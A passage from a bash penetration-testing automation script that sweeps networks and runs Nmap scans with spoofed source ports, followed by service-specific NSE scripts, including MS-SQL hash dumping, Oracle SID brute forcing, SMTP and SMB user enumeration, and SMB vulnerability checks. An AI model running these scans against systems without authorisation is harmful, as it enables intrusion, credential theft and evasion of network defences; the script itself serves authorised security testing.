s/srbranch/Senior Branch/g; s/srsales/Senior Sales/g; s/ ssl / SSL /g; s/-staff/, Staff/g; s/stf/Staff/g; s/-station/, Station/g;
s/-strategic/, Strategic/g; s/-student/, Student/g; s/-substation/, Substation/g; s/-supplier/, Supplier/g; s/-supply/, Supply/g;
s/-surveillance/, Surveillance/g; s/swepco/SWEPCO/g; s/-system/, System/g; s/-tax/, Tax/g; s/-technical/, Technical/g;
s/-telecommunications/, Telecommunications/g; s/ The / the /g; s/-three/, Three/g; s/-tickets/, Tickets/g; s/TierIII/Tier III/g; s/-trading/, Trading/g;
s/-transmission/, Transmission/g; s/ttechnical/Technical/g; s/-turbine/, Turbine/g; s/ to .*$//g; s/ ui / UI /g; s/ uk / UK /g;
s/unsupervisor/Supervisor/g; s/uscg/USCG/g; s/ usa / USA /g; s/ us / US /g; s/ Us / US /g; s/ u.s / US /g; s/usmc/USMC/g; s/-utility/, Utility/g;
s/ ux / UX /g; s/vicepresident/Vice President/g; s/ Va / VA /g; s/ vii / VII /g; s/ vi / VI /g; s/ vms / VMS /g; s/ voip / VoIP /g; s/ vpn / VPN /g;
s/Weblogic/WebLogic/g; s/Websphere/WebSphere/g; s/ With / with /g' > tmp5
# Remove lines that contain 2 words and clean up.
awk 'NF != 2' tmp5 | sed "s/d'a/D'A/g; s/d'c/D'C/g; s/d'e/D'E/g; s/d'h/D'H/g; s/d's/D'S/g; s/l'a/L'A/g; s/o'b/O'B/g; s/o'c/O'C/g; s/o'd/O'D/g;
s/o'f/O'F/g; s/o'g/O'G/g; s/o'h/O'H/g; s/o'k/O'K/g; s/o'l/O'L/g; s/o'm/O'M/g; s/o'N/O'N/g; s/Obrien/O'Brien/g; s/Oconnor/O'Connor/g;
s/Odonnell/O'Donnell/g; s/Ohara/O'Hara/g; s/o'p/O'P/g; s/o'r/O'R/g; s/o's/O'S/g; s/Otoole/O'Toole/g; s/o't/O'T/i" > tmp6
# Replace parenthesis and the contents inside with spaces - thanks Mike G
cat tmp6 | perl -pe 's/(\(.*\))/q[ ] x length $1/ge' > tmp7
# Remove trailing white space, railing commas, and delete lines with a single word
sed 's/[ \t]*$//; s/,$//; /[[:blank:]]/!d' tmp7 | sort -u > $home/data/names.txt
rm tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/names.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_generateTargetList(){
clear
f_banner
echo -e "${BLUE}SCANNING${NC}"
echo
echo "1. Local area network"
echo "2. NetBIOS"
echo "3. netdiscover"
echo "4. Ping sweep"
echo "5. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) f_errorOSX
echo
echo -n "Interface to scan: "
read interface
# Check for no answer
if [[ -z $interface ]]; then
f_error
fi
arp-scan -l -I $interface | egrep -v '(arp-scan|Interface|packets|Polycom|Unknown)' | awk '{print $1}' | $sip | sed '/^$/d' > $home/data/hosts-arp.txt
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/hosts-arp.txt${NC}\n"
echo
echo
exit;;
2) f_errorOSX; f_netbios;;
3) f_errorOSX; f_netdiscover;;
4) f_pingsweep;;
5) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_netbios(){
clear
f_banner
echo -e "${BLUE}Type of input:${NC}"
echo
echo "1. List containing IPs."
echo "2. CIDR"
echo
echo -n "Choice: "
read choice
case $choice in
1)
f_location
echo
echo $medium
echo
nbtscan -f $location
echo
echo
exit;;
2)
echo
echo -n "Enter your CIDR: "
read cidr
# Check for no answer
if [[ -z $cidr ]]; then
f_error
fi
echo
echo $medium
echo
nbtscan -r $cidr
echo
echo
exit;;
*) f_error;;
esac
}
##############################################################################################################
f_netdiscover(){
range=$(ip addr | grep 'global' | cut -d '/' -f1 | awk '{print $2}' | cut -d '.' -f1-3)'.1'
netdiscover -r $range -f -P | grep ':' | awk '{print $1}' > $home/data/netdiscover.txt
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/netdiscover.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_pingsweep(){
clear
f_banner
f_typeofscan
echo -e "${BLUE}Type of input:${NC}"
echo
echo "1. List containing IPs, ranges and/or CIDRs."
echo "2. Manual"
echo
echo -n "Choice: "
read choice
case $choice in
1)
f_location
echo
echo "Running an Nmap ping sweep for live hosts."
nmap -sn -PS -PE --stats-every 10s -g $sourceport -iL $location > tmp
;;
2)
echo
echo -n "Enter your targets: "
read manual
# Check for no answer
if [[ -z $manual ]]; then
f_error
fi
echo
echo "Running an Nmap ping sweep for live hosts."
nmap -sn -PS -PE --stats-every 10s -g $sourceport $manual > tmp
;;
*) f_error;;
esac
cat tmp | grep 'report' | awk '{print $5}' > tmp2
mv tmp2 $home/data/hosts-ping.txt
rm tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/hosts-ping.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_scanname(){
f_typeofscan
echo -e "${YELLOW}[*] Warning spaces in the name will cause errors${NC}"
echo
echo -n "Name of scan: "
read name
# Check for no answer
if [[ -z $name ]]; then
f_error
fi
mkdir -p $name
}
##############################################################################################################
f_typeofscan(){
echo -e "${BLUE}Type of scan: ${NC}"
echo
echo "1. External"
echo "2. Internal"
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
echo
echo -e "${YELLOW}[*] Setting source port to 53 and max probe round trip to 1.5s.${NC}"
sourceport=53
maxrtt=1500ms
echo
echo $medium
echo
;;
2)
echo
echo -e "${YELLOW}[*] Setting source port to 88 and max probe round trip to 500ms.${NC}"
sourceport=88
maxrtt=500ms
echo
echo $medium
echo
;;
3) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_cidr(){
clear
f_banner
f_scanname
echo
echo Usage: 192.168.0.0/16
echo
echo -n "CIDR: "
read cidr
# Check for no answer
if [[ -z $cidr ]]; then
rm -rf $name
f_error
fi
# Check for wrong answer
sub=$(echo $cidr | cut -d '/' -f2)
max=32
if [ "$sub" -gt "$max" ]; then
f_error
fi
echo $cidr | grep '/' > /dev/null 2>&1
if [ $? -ne 0 ]; then
f_error
fi
echo $cidr | grep [[:alpha:]\|[,\\]] > /dev/null 2>&1
if [ $? -eq 0 ]; then
f_error
fi
echo $cidr > tmp-list
location=tmp-list
echo
echo -n "Do you have an exclusion list? (y/N) "
read exclude
if [ "$exclude" == "y" ]; then
echo -n "Enter the path to the file: "
read excludefile
if [[ -z $excludefile ]]; then
f_error
fi
if [ ! -f $excludefile ]; then
f_error
fi
else
touch tmp
excludefile=tmp
fi
START=$(date +%r\ %Z)
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_list(){
clear
f_banner
f_scanname
f_location
touch tmp
excludefile=tmp
START=$(date +%r\ %Z)
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_single(){
clear
f_banner
f_scanname
echo
echo -n "IP, range, or URL: "
read target
# Check for no answer
if [[ -z $target ]]; then
rm -rf $name
f_error
fi
echo $target > tmp-target
location=tmp-target
touch tmp
excludefile=tmp
START=$(date +%r\ %Z)
f_scan
f_ports
f_scripts
f_metasploit
f_report
}
##############################################################################################################
f_scan(){
custom='1-1040,1050,1080,1099,1158,1344,1352,1433,1521,1720,1723,1883,1911,1962,2049,2202,2375,2628,2947,3000,3031,3050,3260,3306,3310,3389,3500,3632,4369,5000,5019,5040,5060,5432,5560,5631,5632,5666,5672,5850,5900,5920,5984,5985,6000,6001,6002,6003,6004,6005,6379,6666,7210,7634,7777,8000,8009,8080,8081,8091,8140,8222,8332,8333,8400,8443,8834,9000,9084,9100,9160,9600,9999,10000,11211,12000,12345,13364,19150,27017,28784,30718,35871,37777,46824,49152,50000,50030,50060,50070,50075,50090,60010,60030'
full='1-65535'
udp='53,67,123,137,161,407,500,523,623,1434,1604,1900,2302,2362,3478,3671,4800,5353,5683,6481,17185,31337,44818,47808'
echo
echo -n "Perform full TCP port scan? (y/N) "
read scan
if [ "$scan" == "y" ]; then
tcp=$full
else
tcp=$custom
fi
echo
echo -n "Perform version detection? (y/N) "
read vdetection
if [ "$vdetection" == "y" ]; then
S='sSV'
U='sUV'
else
S='sS'
U='sU'
fi
echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay
# Check for no answer
if [[ -z $delay ]]; then
delay='0'
fi
if [ $delay -lt 0 ] || [ $delay -gt 5 ]; then
f_error
fi
echo
echo $medium
nmap -iL $location --excludefile $excludefile --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -$S -$U -O --osscan-guess --max-os-tries 1 -p T:$tcp,U:$udp --max-retries 3 --min-rtt-timeout 100ms --max-rtt-timeout $maxrtt --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open --stats-every 10s -g $sourceport --scan-delay $delay -oA $name/nmap
x=$(grep '(0 hosts up)' $name/nmap.nmap)
if [[ -n $x ]]; then
rm -rf "$name" tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "${YELLOW}[*] No live hosts were found.${NC}"
echo
echo
exit
fi
# Clean up
egrep -v '(0000:|0010:|0020:|0030:|0040:|0050:|0060:|0070:|0080:|0090:|00a0:|00b0:|00c0:|00d0:|1 hop|closed|guesses|GUESSING|filtered|fingerprint|FINGERPRINT|general purpose|initiated|latency|Network Distance|No exact OS|No OS matches|OS:|OS CPE|Please report|RTTVAR|scanned in|SF|unreachable|Warning|WARNING)' $name/nmap.nmap | sed 's/Nmap scan report for //; /^$/! b end; n; /^$/d; : end' > $name/nmap.txt
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $name/nmap.nmap | $sip > $name/hosts.txt
hosts=$(wc -l $name/hosts.txt | cut -d ' ' -f1)
grep 'open' $name/nmap.txt | grep -v 'WARNING' | awk '{print $1}' | sort -un > $name/ports.txt
grep 'tcp' $name/ports.txt | cut -d '/' -f1 > $name/ports-tcp.txt
grep 'udp' $name/ports.txt | cut -d '/' -f1 > $name/ports-udp.txt
grep 'open' $name/nmap.txt | grep -v 'really open' | awk '{for (i=4;i<=NF;i++) {printf "%s%s",sep, $i;sep=" "}; printf "\n"}' | sed 's/^ //' | sort -u | sed '/^$/d' > $name/banners.txt
for i in $(cat $name/ports-tcp.txt); do
TCPPORT=$i
cat $name/nmap.gnmap | grep " $i/open/tcp//http/\| $i/open/tcp//http-alt/\| $i/open/tcp//http-proxy/\| $i/open/tcp//appserv-http/" |
sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.http://.g' -e "s/$/:$i/g" | $sip >> tmp
cat $name/nmap.gnmap | grep " $i/open/tcp//https/\| $i/open/tcp//https-alt/\| $i/open/tcp//ssl|giop/\| $i/open/tcp//ssl|http/\| $i/open/tcp//ssl|unknown/" |
sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.https://.g' -e "s/$/:$i/g" | $sip >> tmp2
done
sed 's/http:\/\///g' tmp > $name/http.txt
sed 's/https:\/\///g' tmp2 > $name/https.txt
# Remove all empty files
find $name/ -type f -empty -exec rm {} +
}
##############################################################################################################
f_ports(){
echo
echo $medium
echo
echo -e "${BLUE}Locating high value ports.${NC}"
echo " TCP"
TCP_PORTS="13 19 21 22 23 25 37 69 70 79 80 102 110 111 119 135 139 143 389 433 443 445 465 502 512 513 514 523 524 548 554 563 587 623 631 636 771 831 873 902 993 995 998 1050 1080 1099 1158 1344 1352 1433 1521 1720 1723 1883 1911 1962 2049 2202 2375 2628 2947 3000 3031 3050 3260 3306 3310 3389 3500 3632 4369 5000 5019 5040 5060 5432 5560 5631 5632 5666 5672 5850 5900 5920 5984 5985 6000 6001 6002 6003 6004 6005 6379 6666 7210 7634 7777 8000 8009 8080 8081 8091 8140 8222 8332 8333 8400 8443 8834 9000 9084 9100 9160 9600 9999 10000 11211 12000 12345 13364 19150 27017 28784 30718 35871 37777 46824 49152 50000 50030 50060 50070 50075 50090 60010 60030"
for i in $TCP_PORTS; do
cat $name/nmap.gnmap | grep "\<$i/open/tcp\>" | cut -d ' ' -f2 > $name/$i.txt
done
if [[ -e $name/523.txt ]]; then
mv $name/523.txt $name/523-tcp.txt
fi
if [[ -e $name/5060.txt ]]; then
mv $name/5060.txt $name/5060-tcp.txt
fi
echo " UDP"
UDP_PORTS="53 67 123 137 161 407 500 523 623 1434 1604 1900 2302 2362 3478 3671 4800 5353 5683 6481 17185 31337 44818 47808"
for i in $UDP_PORTS; do
cat $name/nmap.gnmap | grep "\<$i/open/udp\>" | cut -d ' ' -f2 > $name/$i.txt
done
if [[ -e $name/523.txt ]]; then
mv $name/523.txt $name/523-udp.txt
fi
# Combine Apache HBase ports and sort
cat $name/60010.txt $name/60030.txt > tmp
$sip tmp > $name/apache-hbase.txt
# Combine Bitcoin ports and sort
cat $name/8332.txt $name/8333.txt > tmp
$sip tmp > $name/bitcoin.txt
# Combine DB2 ports and sort
cat $name/523-tcp.txt $name/523-udp.txt > tmp
$sip tmp > $name/db2.txt
# Combine Hadoop ports and sort
cat $name/50030.txt $name/50060.txt $name/50070.txt $name/50075.txt $name/50090.txt > tmp
$sip tmp > $name/hadoop.txt
# Combine NNTP ports and sort
cat $name/119.txt $name/433.txt $name/563.txt > tmp
$sip tmp > $name/nntp.txt
# Combine SMTP ports and sort
cat $name/25.txt $name/465.txt $name/587.txt > tmp
$sip tmp > $name/smtp.txt
# Combine X11 ports and sort
cat $name/6000.txt $name/6001.txt $name/6002.txt $name/6003.txt $name/6004.txt $name/6005.txt > tmp
$sip tmp > $name/x11.txt
# Remove all empty files
find $name/ -type f -empty -exec rm {} +
}
##############################################################################################################
f_cleanup(){
sed 's/Nmap scan report for //' tmp | sed '/^SF/d' | egrep -v '(0 of 100|afp-serverinfo:|ACCESS_DENIED|appears to be clean|cannot|closed|close|Compressors|Could not|Couldn|ctr-|Denied|denied|Did not|DISABLED|dns-nsid:|dns-service-discovery:|Document Moved|doesn|eppc-enum-processes|error|Error|ERROR|Failed to get|failed|filtered|GET|hbase-region-info:|HEAD|Host is up|Host script results|impervious|incorrect|is GREAT|latency|ldap-rootdse:|LDAP Results|Likely CLEAN|MAC Address|Mac OS X security type|nbstat:|No accounts left|No Allow|no banner|none|Nope.|not allowed|Not Found|Not Shown|not supported|NOT VULNERABLE|nrpe-enum:|ntp-info:|rdp-enum-encryption:|remaining|rpcinfo:|seconds|Security types|See http|Server not returning|Service Info|service unrecognized|Skipping|smb-check-vulns|smb-mbenum:|sorry|Starting|telnet-encryption:|Telnet server does not|TIMEOUT|Unauthorized|uncompressed|unhandled|Unknown|viewed over a secure|vnc-info:|wdb-version:)' | grep -v "Can't" | awk -v n=-2 'NR==n+1 && !NF{next} /^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/ {n=NR}1' | awk -v n=-2 'NR==n+1 && NF{print hold} /sslv2-drown:/ {n=NR;hold=$0;next}1' | awk -F '\n' 'BEGIN{RS="\n\n"}NF>3{print $0 "\n"}' > tmp4
}
##############################################################################################################
f_scripts(){
echo
echo $medium
echo
echo -e "${BLUE}Running Nmap scripts.${NC}"
# If the file for the corresponding port doesn't exist, skip
if [[ -e $name/13.txt ]]; then
echo " Daytime"
nmap -iL $name/13.txt -Pn -n --open -p13 --script-timeout 1m --script=daytime --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-13.txt
fi
if [[ -e $name/21.txt ]]; then
echo " FTP"
nmap -iL $name/21.txt -Pn -n --open -p21 --script-timeout 1m --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-21.txt
fi
if [[ -e $name/22.txt ]]; then
echo " SSH"
nmap -iL $name/22.txt -Pn -n --open -p22 --script-timeout 1m --script=sshv1,ssh2-enum-algos --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-22.txt
fi
if [[ -e $name/23.txt ]]; then
echo " Telnet"
nmap -iL $name/23.txt -Pn -n --open -p23 --script-timeout 1m --script=banner,cics-info,cics-enum,cics-user-enum,telnet-encryption,telnet-ntlm-info,tn3270-screen,tso-enum --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-23.txt
fi
if [[ -e $name/smtp.txt ]]; then
echo " SMTP"
nmap -iL $name/smtp.txt -Pn -n --open -p25,465,587 --script-timeout 1m --script=banner,smtp-commands,smtp-ntlm-info,smtp-open-relay,smtp-strangeport,smtp-enum-users,ssl*,tls-nextprotoneg -sV --script-args smtp-enum-users.methods={EXPN,RCPT,VRFY} --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-smtp.txt
fi
if [[ -e $name/37.txt ]]; then
echo " Time"
nmap -iL $name/37.txt -Pn -n --open -p37 --script-timeout 1m --script=rfc868-time --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-37.txt
fi
if [[ -e $name/53.txt ]]; then
echo " DNS"
nmap -iL $name/53.txt -Pn -n -sU --open -p53 --script-timeout 1m --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-53.txt
fi
if [[ -e $name/67.txt ]]; then
echo " DHCP"
nmap -iL $name/67.txt -Pn -n -sU --open -p67 --script-timeout 1m --script=dhcp-discover --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-67.txt
fi
if [[ -e $name/70.txt ]]; then
echo " Gopher"
nmap -iL $name/70.txt -Pn -n --open -p70 --script-timeout 1m --script=gopher-ls --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-70.txt
fi
if [[ -e $name/79.txt ]]; then
echo " Finger"
nmap -iL $name/79.txt -Pn -n --open -p79 --script-timeout 1m --script=finger --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-79.txt
fi
if [[ -e $name/102.txt ]]; then
echo " S7"
nmap -iL $name/102.txt -Pn -n --open -p102 --script-timeout 1m --script=s7-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-102.txt
fi
if [[ -e $name/110.txt ]]; then
echo " POP3"
nmap -iL $name/110.txt -Pn -n --open -p110 --script-timeout 1m --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-110.txt
fi
if [[ -e $name/111.txt ]]; then
echo " RPC"
nmap -iL $name/111.txt -Pn -n --open -p111 --script-timeout 1m --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-111.txt
fi
if [[ -e $name/nntp.txt ]]; then
echo " NNTP"
nmap -iL $name/nntp.txt -Pn -n --open -p119,433,563 --script-timeout 1m --script=nntp-ntlm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-nntp.txt
fi
if [[ -e $name/123.txt ]]; then
echo " NTP"
nmap -iL $name/123.txt -Pn -n -sU --open -p123 --script-timeout 1m --script=ntp-info,ntp-monlist --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-123.txt
fi
if [[ -e $name/137.txt ]]; then
echo " NetBIOS"
nmap -iL $name/137.txt -Pn -n -sU --open -p137 --script-timeout 1m --script=nbstat --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
sed -i '/^MAC/{n; /.*/d}' tmp4 # Find lines that start with MAC, and delete the following line
sed -i '/^137\/udp/{n; /.*/d}' tmp4 # Find lines that start with 137/udp, and delete the following line
mv tmp4 $name/script-137.txt
fi
if [[ -e $name/139.txt ]]; then
echo " SMB Vulns"
nmap -iL $name/139.txt -Pn -n --open -p139 --script-timeout 1m --script=smb* --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(SERVICE|netbios)' tmp4 > tmp5
sed '1N;N;/\(.*\n\)\{2\}.*VULNERABLE/P;$d;D' tmp5
sed '/^$/d' tmp5 > tmp6
grep -v '|' tmp6 > $name/script-smbvulns.txt
fi
if [[ -e $name/143.txt ]]; then
echo " IMAP"
nmap -iL $name/143.txt -Pn -n --open -p143 --script-timeout 1m --script=imap-capabilities,imap-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-143.txt
fi
if [[ -e $name/161.txt ]]; then
echo " SNMP"
nmap -iL $name/161.txt -Pn -n -sU --open -p161 --script-timeout 1m --script=snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-161.txt
fi
if [[ -e $name/389.txt ]]; then
echo " LDAP"
nmap -iL $name/389.txt -Pn -n --open -p389 --script-timeout 1m --script=ldap-rootdse,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-389.txt
fi
if [[ -e $name/443.txt ]]; then
echo " VMware"
nmap -iL $name/443.txt -Pn -n --open -p443 --script-timeout 1m --script=vmware-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-443.txt
fi
if [[ -e $name/445.txt ]]; then
echo " SMB"
nmap -iL $name/445.txt -Pn -n --open -p445 --script-timeout 1m --script=msrpc-enum,smb*,stuxnet-detect --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
sed -i '/^445/{n; /.*/d}' tmp4 # Find lines that start with 445, and delete the following line
mv tmp4 $name/script-445.txt
fi
if [[ -e $name/500.txt ]]; then
echo " Ike"
nmap -iL $name/500.txt -Pn -n -sS -sU --open -p500 --script-timeout 1m --script=ike-version -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-500.txt
fi
if [[ -e $name/db2.txt ]]; then
echo " DB2"
nmap -iL $name/db2.txt -Pn -n -sS -sU --open -p523 --script-timeout 1m --script=db2-das-info,db2-discover --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-523.txt
fi
if [[ -e $name/524.txt ]]; then
echo " Novell NetWare Core Protocol"
nmap -iL $name/524.txt -Pn -n --open -p524 --script-timeout 1m --script=ncp-enum-users,ncp-serverinfo --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-524.txt
fi
if [[ -e $name/548.txt ]]; then
echo " AFP"
nmap -iL $name/548.txt -Pn -n --open -p548 --script-timeout 1m --script=afp-ls,afp-path-vuln,afp-serverinfo,afp-showmount --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-548.txt
fi
if [[ -e $name/554.txt ]]; then
echo " RTSP"
nmap -iL $name/554.txt -Pn -n --open -p554 --script-timeout 1m --script=rtsp-methods --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-554.txt
fi
if [[ -e $name/623.txt ]]; then
echo " IPMI"
nmap -iL $name/623.txt -Pn -n -sU --open -p623 --script-timeout 1m --script=ipmi-version,ipmi-cipher-zero --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-623.txt
fi
if [[ -e $name/631.txt ]]; then
echo " CUPS"
nmap -iL $name/631.txt -Pn -n --open -p631 --script-timeout 1m --script=cups-info,cups-queue-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-631.txt
fi
if [[ -e $name/636.txt ]]; then
echo " LDAP/S"
nmap -iL $name/636.txt -Pn -n --open -p636 --script-timeout 1m --script=ldap-rootdse,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-636.txt
fi
if [[ -e $name/873.txt ]]; then
echo " rsync"
nmap -iL $name/873.txt -Pn -n --open -p873 --script-timeout 1m --script=rsync-list-modules --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-873.txt
fi
if [[ -e $name/993.txt ]]; then
echo " IMAP/S"
nmap -iL $name/993.txt -Pn -n --open -p993 --script-timeout 1m --script=banner,imap-capabilities,imap-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-993.txt
fi
if [[ -e $name/995.txt ]]; then
echo " POP3/S"
nmap -iL $name/995.txt -Pn -n --open -p995 --script-timeout 1m --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-995.txt
fi
if [[ -e $name/1050.txt ]]; then
echo " COBRA"
nmap -iL $name/1050.txt -Pn -n --open -p1050 --script-timeout 1m --script=giop-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1050.txt
fi
if [[ -e $name/1080.txt ]]; then
echo " SOCKS"
nmap -iL $name/1080.txt -Pn -n --open -p1080 --script-timeout 1m --script=socks-auth-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1080.txt
fi
if [[ -e $name/1099.txt ]]; then
echo " RMI Registry"
nmap -iL $name/1099.txt -Pn -n --open -p1099 --script-timeout 1m --script=rmi-dumpregistry --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1099.txt
fi
if [[ -e $name/1344.txt ]]; then
echo " ICAP"
nmap -iL $name/1344.txt -Pn -n --open -p1344 --script-timeout 1m --script=icap-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1344.txt
fi
if [[ -e $name/1352.txt ]]; then
echo " Lotus Domino"
nmap -iL $name/1352.txt -Pn -n --open -p1352 --script-timeout 1m --script=domino-enum-users --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1352.txt
fi
if [[ -e $name/1433.txt ]]; then
echo " MS-SQL"
nmap -iL $name/1433.txt -Pn -n --open -p1433 --script-timeout 1m --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1433.txt
fi
if [[ -e $name/1434.txt ]]; then
echo " MS-SQL UDP"
nmap -iL $name/1434.txt -Pn -n -sU --open -p1434 --script-timeout 1m --script=ms-sql-dac --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1434.txt
fi
if [[ -e $name/1521.txt ]]; then
echo " Oracle"
nmap -iL $name/1521.txt -Pn -n --open -p1521 --script-timeout 1m --script=oracle-tns-version,oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1521.txt
fi
if [[ -e $name/1604.txt ]]; then
echo " Citrix"
nmap -iL $name/1604.txt -Pn -n -sU --open -p1604 --script-timeout 1m --script=citrix-enum-apps,citrix-enum-servers --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1604.txt
fi
if [[ -e $name/1723.txt ]]; then
echo " PPTP"
nmap -iL $name/1723.txt -Pn -n --open -p1723 --script-timeout 1m --script=pptp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1723.txt
fi
if [[ -e $name/1883.txt ]]; then
echo " MQTT"
nmap -iL $name/1883.txt -Pn -n --open -p1883 --script-timeout 1m --script=mqtt-subscribe --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1883.txt
fi
if [[ -e $name/1911.txt ]]; then
echo " Tridium Niagara Fox"
nmap -iL $name/1911.txt -Pn -n --open -p1911 --script-timeout 1m --script=fox-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1911.txt
fi
if [[ -e $name/1962.txt ]]; then
echo " PCWorx"
nmap -iL $name/1962.txt -Pn -n --open -p1962 --script-timeout 1m --script=pcworx-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1962.txt
fi
if [[ -e $name/2049.txt ]]; then
echo " NFS"
